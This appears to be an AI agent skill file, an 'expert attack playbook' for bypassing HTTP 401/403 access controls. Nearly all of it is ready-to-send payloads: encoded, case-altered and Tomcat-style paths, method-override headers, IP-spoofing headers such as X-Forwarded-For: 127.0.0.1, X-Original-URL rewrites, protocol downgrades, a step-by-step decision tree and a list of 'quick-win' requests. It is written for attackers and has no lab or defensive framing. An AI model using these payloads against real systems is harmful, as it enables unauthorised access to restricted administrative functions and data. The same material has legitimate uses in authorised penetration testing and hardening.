SKILL: 401/403 Bypass Techniques — Expert Attack Playbook
AI LOAD INSTRUCTION: Comprehensive 401/403 forbidden bypass techniques. Covers path normalization tricks, HTTP method override, header-based bypasses (X-Original-URL, X-Forwarded-For), protocol version tricks, and combination attacks. Base models typically know 2-3 header bypasses but miss the full matrix of path manipulation variants and verb+path combos.
0. RELATED ROUTING
- authbypass-authentication-flaws — broader auth bypass (login flaws, session handling)
- waf-bypass-techniques — when bypass is WAF-specific rather than access control
- http-host-header-attacks — Host header manipulation for routing bypass
- request-smuggling — smuggle past access controls entirely
- http2-specific-attacks — h2c smuggling to bypass proxy ACLs
1. PATH MANIPULATION BYPASSES
The core idea: the reverse proxy/WAF checks one path format, but the backend normalizes differently.
1.1 Trailing Slash / Missing Slash
/admin → 403
/admin/ → 200 ✓ (trailing slash)
/admin/. → 200 ✓ (trailing dot)
1.2 Case Sensitivity
/admin → 403
/Admin → 200 ✓
/ADMIN → 200 ✓
/aDmIn → 200 ✓
Works when: proxy rule is case-sensitive but backend is case-insensitive (common on Windows/IIS).
1.3 URL Encoding
/admin → 403
/%61dmin → 200 ✓ (encode 'a')
/admi%6e → 200 ✓ (encode 'n')
/%61%64%6d%69%6e → 200 ✓ (full encode)
1.4 Double URL Encoding
/admin → 403
/%2561dmin → 200 ✓ (%25 = %, decoded twice: %61 → a)
/admin%252f → 200 ✓
/admin..%252f → 200 ✓
1.5 Unicode / UTF-8 Encoding
/admin → 403
/admi%C0%AE → 200 ✓ (overlong UTF-8 for '.')
/admi%C0%6E → 200 ✓ (overlong encoding)
/%C0%AFadmin → 200 ✓ (overlong '/')
1.6 Dot-Segment / Path Traversal
/admin → 403
/./admin → 200 ✓
//admin → 200 ✓
/admin/./ → 200 ✓
/.//admin → 200 ✓
/admin..;/ → 200 ✓ (Tomcat path parameter)
1.7 Null Byte
/admin → 403
/admin%00 → 200 ✓
/admin%00.json → 200 ✓
/%00/admin → 200 ✓
1.8 Path Parameter Injection
/admin → 403
/admin;foo=bar → 200 ✓ (Tomcat/Java treats ; as path param)
/admin; → 200 ✓
/admin;x → 200 ✓
1.9 Trailing Special Characters
/admin%20 (space) /admin%09 (tab) /admin? (empty query)
/admin.json /admin.html /admin/~
1.10 Backslash (Windows/IIS)
/admin\ /admin\..\/ \..\admin
1.11 Combined Path Tricks
///admin/// /./admin/./ /admin/..;/admin (Tomcat) /%2e/admin
2. HTTP METHOD BYPASS
2.1 Direct Method Change
GET /admin → 403
POST /admin → 200 ✓
PUT /admin → 200 ✓
PATCH /admin → 200 ✓
DELETE /admin → 200 ✓
OPTIONS /admin → 200 ✓ (may leak allowed methods)
TRACE /admin → 200 ✓ (may reflect headers — XST)
HEAD /admin → 200 ✓ (same as GET but no body — confirms access)
2.2 Method Override Headers
When the proxy blocks by method, but the backend reads override headers:
GET /admin HTTP/1.1
X-HTTP-Method-Override: PUT
GET /admin HTTP/1.1
X-Method-Override: POST
GET /admin HTTP/1.1
X-HTTP-Method: DELETE
POST /admin HTTP/1.1
X-HTTP-Method-Override: PATCH
_method=PUT (in POST body — Rails, Laravel)
2.3 Custom / Invalid Methods
FOOBAR /admin HTTP/1.1 → some ACLs only check GET/POST
GETS /admin HTTP/1.1 → typo-like methods may bypass
CONNECT /admin HTTP/1.1 → proxy may tunnel
PROPFIND /admin HTTP/1.1 → WebDAV method
MOVE /admin HTTP/1.1 → WebDAV method
3. HEADER-BASED BYPASS
3.1 URL Rewrite Headers (Nginx/IIS)
These headers tell the backend the "real" URL, bypassing proxy-level path checks:
GET / HTTP/1.1
X-Original-URL: /admin
GET / HTTP/1.1
X-Rewrite-URL: /admin
The proxy sees GET / (allowed), but the backend routes to /admin.
3.2 IP Spoofing Headers (Whitelist Bypass)
Headers to try (each with values 127.0.0.1, 10.0.0.1, 0.0.0.0, ::1):
X-Forwarded-For | X-Real-IP | X-Originating-IP | X-Remote-IP
X-Remote-Addr | X-Client-IP | True-Client-IP | Cluster-Client-IP
X-ProxyUser-IP | X-Custom-IP-Authorization | Forwarded: for=127.0.0.1
IP encoding variants: 0177.0.0.1 (octal), 2130706433 (decimal), 0x7f000001 (hex), localhost
3.3 Other Header Tricks
Referer: https://target.com/admin # Referrer check bypass
Origin: https://target.com # Origin check bypass
Host: localhost # Host header manipulation
X-Forwarded-Host: localhost # Forwarded host
Content-Type: application/json # Content-type switch
X-Requested-With: XMLHttpRequest # AJAX flag
4. PROTOCOL VERSION BYPASS
# HTTP/1.0 (some ACLs only apply to HTTP/1.1)
GET /admin HTTP/1.0
# HTTP/0.9 (extremely legacy — no headers)
GET /admin
# HTTP/2 pseudo-header tricks
:method: GET
:path: /admin
:authority: target.com
# See ../http2-specific-attacks/SKILL.md for H2-specific bypasses
5. VERB TAMPERING + PATH COMBINATION
Combine multiple techniques for higher success rate:
POST / HTTP/1.1 # method override + URL rewrite
X-Original-URL: /admin
X-HTTP-Method-Override: GET
GET /%61dmin HTTP/1.1 # IP spoof + path encoding
X-Forwarded-For: 127.0.0.1
GET /Admin HTTP/1.0 # protocol + case + IP spoof
X-Forwarded-For: 127.0.0.1
6. TECHNOLOGY-SPECIFIC BYPASSES
| Server | Key Tricks |
|---|---|
| Apache | /admin/ (trailing slash), /.admin (dot prefix), /admin%0d (CR) |
| Nginx | /Admin (case), /admin../ (normalization), X-Original-URL: /admin |
| IIS/ASP.NET | /admin;.css (path param+ext), /admin\ (backslash), /admin::$DATA (ADS), /admin%20 |
| Tomcat/Java | /admin;foo (path param), /admin..;/ (traversal), /;/admin (empty param) |
| Spring | /admin.anything (suffix matching, older), /admin/ (trailing slash) |
7. AUTOMATED TOOLS
| Tool | Purpose | URL |
|---|---|---|
| byp4xx | Comprehensive 403 bypass scanner | github.com/lobuhi/byp4xx |
| 403bypasser | Automated header/path/method bypass | github.com/sting8k/403bypasser |
| dirsearch | Directory brute-force with encoding variants | github.com/maurosoria/dirsearch |
| feroxbuster | Recursive content discovery | github.com/epi052/feroxbuster |
| Burp Intruder | Custom payload lists for manual testing | portswigger.net |
byp4xx usage
# Basic usage
./byp4xx.sh https://target.com/admin
# Output shows all attempted bypasses and their response codes
# 200/301/302 responses = potential bypass found
8. DECISION TREE
Got 401 or 403 on a path?
│
├── Try PATH MANIPULATION first (highest success rate)
│ ├── /path/ (trailing slash)
│ ├── /PATH (case change)
│ ├── /path%20 (trailing space)
│ ├── /./path (dot segment)
│ ├── //path (double slash)
│ ├── /path;x (path parameter — Java/Tomcat)
│ ├── /path..;/ (Tomcat specific)
│ ├── /%2e/path (encoded dot)
│ ├── /path%00 (null byte)
│ ├── /path%23 (encoded hash)
│ └── Result? → 200 = bypass found
│
├── Path tricks failed → Try METHOD BYPASS
│ ├── POST/PUT/PATCH/DELETE/OPTIONS
│ ├── HEAD (same as GET without body)
│ ├── X-HTTP-Method-Override: PUT
│ └── TRACE (may reflect auth headers — XST)
│
├── Method tricks failed → Try HEADER BYPASS
│ ├── X-Original-URL: /path (Nginx/IIS rewrite)
│ ├── X-Rewrite-URL: /path (same concept)
│ ├── X-Forwarded-For: 127.0.0.1 (IP whitelist)
│ ├── X-Real-IP: 127.0.0.1
│ ├── True-Client-IP: 127.0.0.1
│ └── Referer: https://target.com/path
│
├── Header tricks failed → Try PROTOCOL BYPASS
│ ├── HTTP/1.0 instead of 1.1
│ ├── HTTP/2 h2c smuggling (../http2-specific-attacks/)
│ └── WebSocket upgrade
│
├── Single techniques failed → Try COMBINATIONS
│ ├── Method + Path: POST /PATH/
│ ├── Header + Path: X-Forwarded-For + /path%20
│ ├── All three: POST + X-Original-URL + IP headers
│ └── Protocol + Path: HTTP/1.0 + encoded path
│
├── All bypasses failed → Consider ALTERNATIVE APPROACHES
│ ├── Request smuggling (../request-smuggling/) → smuggle past ACL
│ ├── SSRF (../ssrf-server-side-request-forgery/) → access from server
│ ├── IDOR (../idor-broken-object-authorization/) → access data directly
│ └── Auth flaws (../authbypass-authentication-flaws/) → login bypass
│
└── Automated scan with byp4xx / 403bypasser for completeness
9. QUICK REFERENCE — KEY PAYLOADS
# Top 10 quick-wins (try these first)
GET /admin/ HTTP/1.1 # trailing slash
GET /Admin HTTP/1.1 # case change
GET /admin%20 HTTP/1.1 # trailing space
GET /./admin HTTP/1.1 # dot segment
GET //admin HTTP/1.1 # double slash
POST /admin HTTP/1.1 # method change
GET / HTTP/1.1 # X-Original-URL bypass
X-Original-URL: /admin
GET /admin HTTP/1.1 # IP whitelist bypass
X-Forwarded-For: 127.0.0.1
GET /admin;.css HTTP/1.1 # IIS path param
GET /admin..;/ HTTP/1.1 # Tomcat bypass